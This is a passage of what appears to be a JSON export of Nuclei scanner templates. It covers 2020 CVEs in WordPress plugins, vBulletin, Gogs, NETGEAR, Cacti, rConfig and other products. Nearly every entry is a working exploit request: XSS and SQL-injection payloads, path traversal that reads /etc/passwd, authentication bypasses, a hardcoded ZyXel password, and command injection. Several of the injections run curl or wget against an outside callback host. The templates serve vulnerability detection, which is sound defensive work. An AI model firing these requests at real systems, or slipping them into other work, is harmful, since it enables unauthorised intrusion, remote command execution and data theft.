Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-6207","info":{"name":"SAP Solution Manager 7.2 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /EemAdminService/EemAdmin HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:adm=\"http://sap.com/smd/eem/admin/\"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":Envelope",":Body",":getAllAgentInfoResponse"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17496","info":{"name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\"\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11530","info":{"name":"WordPress Chop Slider 3 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A) HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/javascript\")","contains(body, \"$(document).ready(function()\")"],"condition":"and"}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8771","info":{"name":"WordPress Time Capsule < 1.21.16 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n\nIWP_JSON_PREFIX\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"adminmenumain\" role=\"navigation\" aria-label=\"Main menu\">","<h1>Dashboard</h1>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["wordpress_[a-z0-9]+=([A-Za-z0-9%]+)"],"part":"header"}]}]},{"id":"CVE-2020-12720","info":{"name":"vBulletin SQL Injection","severity":"critical"},"requests":[{"raw":["POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nnodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-\n"],"matchers":[{"type":"word","words":["vbulletinrce"]}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-35234","info":{"name":"SMTP WP Plugin Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/easy-wp-smtp/","{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"],"matchers":[{"type":"word","words":["debug","log","Index of"],"condition":"and"}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25864","info":{"name":"HashiCorp Consul/Consul Enterprise <=1.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n\n<!DOCTYPE html><script>alert(document.domain)</script>\n","GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body_2","words":["<!DOCTYPE html><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-17456","info":{"name":"SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserTime=081119502020&currentTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin\n","POST /cgi-bin/system_log.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCommand=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9043","info":{"name":"WordPress wpCentral <1.5.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/index.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, 'wpCentral Connection Key')","contains(body_4, \"pagenow = \\'dashboard\\'\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"authkey","group":1,"regex":["style=\"word-wrap:break-word;\">([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL injection","severity":"critical"},"requests":[{"raw":["GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5({{num}}),0x5B50574E5D3C42523E)%20limit%200,1),NULL-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35846","info":{"name":"Agentejo Cockpit < 0.11.2 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/check"],"body":"{\n  \"auth\": {\n    \"user\": {\n      \"$eq\": \"admin\"\n    },\n    \"password\": [\n      0\n    ]\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password_verify() expects parameter"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13483","info":{"name":"Bitrix24 <=20.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href=\"/*\">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>","{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"/*\">*/)});function __MobileAppList(){alert(1)}//","function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-27361","info":{"name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/media/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /pme/media","Parent Directory"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27481","info":{"name":"Good Layers LMS Plugin <= 2.1.4 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=gdlr_lms_cancel_booking&id=(SELECT%201337%20FROM%20(SELECT(SLEEP(6)))MrMV)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, 'goodlayers-lms') || contains(body, 'goodlms')"],"condition":"and"}]}]},{"id":"CVE-2020-3452","info":{"name":"Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../","{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"],"matchers":[{"type":"word","words":["INTERNAL_PASSWORD_ENABLED","CONF_VIRTUAL_KEYBOARD"],"condition":"and"}]}]},{"id":"CVE-2020-23972","info":{"name":"Joomla! Component GMapFP 3.5 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: {{BaseURL}}\nConnection: close\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"option\"\n\ncom_gmapfp\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"image1\"; filename=\"{{name}}.html.gif\"\nContent-Type: text/html\n\nprojectdiscovery\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"no_html\"\n\nno_html\n------WebKitFormBoundarySHHbUsfCoxlX1bpS--\n"],"payloads":{"component":["com_gmapfp","comgmapfp"]},"extractors":[{"type":"regex","regex":["window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"],"part":"body"}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-19282","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9425","info":{"name":"rConfig <3.9.4 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/settings.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["defaultNodeUsername","defaultNodePassword"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8813","info":{"name":"Cacti v1.2.8 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /graph_realtime.php?action=init HTTP/1.1\nHost: {{Hostname}}\nCookie: Cacti=%3Bcurl%20http%3A//{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-9402","info":{"name":"Django SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1"],"matchers":[{"type":"word","words":["DatabaseError at","ORA-29257:","ORA-06512:","Request Method:"],"condition":"and"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15568","info":{"name":"TerraMaster TOS <.1.29 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3E{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /include/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication 